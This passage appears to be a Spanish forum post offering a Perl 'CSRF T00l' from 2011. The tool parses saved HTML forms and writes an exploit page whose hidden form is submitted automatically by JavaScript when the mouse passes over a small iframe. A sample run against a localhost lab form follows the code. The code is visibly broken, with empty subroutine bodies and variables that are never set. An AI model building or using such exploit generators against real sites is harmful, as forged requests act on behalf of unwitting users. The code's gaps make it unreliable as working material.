para la vulnerabildiad Cross Site Request Forgery , despues genera el resultado
en una carpeta creada con el programa con el nombre de la web.
#!usr/bin/perl #CSRF T00l (C) Doddy Hackman 2011 use HTML::Form; installer(); head(); if($ARGV[0]) { now($ARGV[0]); } else { sintax(); } copyright(); sub now { unless(-f $_[0]) { copyright(); } my @testar = HTML::Form->parse($words,"/"); $count = 0; foreach my $test(@testar) { $count++; if ($test->attr(name) eq "") { } else { } @inputs = $test->inputs; foreach $in(@inputs) { } } if ($op ne "") { $op--; my $probar = (HTML::Form->parse($words,"/"))[$op]; my $action = ver($words,$op); my $fin = nombre($action).".html"; savefile("<form action=$action method=".$probar->method." name=exploit>",$fin); @input = $probar->inputs; foreach $in(@input) { savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin); } my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()} </script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()> "; savefile($final,$fin); } } sub ver { my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]]; my $action = $probar->action; my $co = $action; if ($action eq "" or $action eq "/"){ } else { } } sub installer { unless (-d "logs_csrf/") { }} sub nombre { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); } sub savefile { close SAVE; } sub sintax { } sub head { } sub copyright { } # ¿ The End ?
Ejemplo de uso
C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
Finales\CSRF Tool> read.txt
-- == CSRF T00l == --
[+] File to parse : read.txt
-- == Form 1 == --
[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET
-- == Input == --
Type Name Value
text ver
password veras
submit control Agregar
-- == Form 2 == --
[+] Name : No Found
[+] Action : /
[+] Method : POST
-- == Input == --
Type Name Value
text ac
submit ee aaa
[+] Form to generate : 1
[+] Value of the ver : aaa
[+] Value of the veras : aaa
[+] Value of the control : aaa
[+] CSRF Exploit Generated
[+] To can see in logscsrf/localhost.html
-- == Doddy Hackman 2011 == --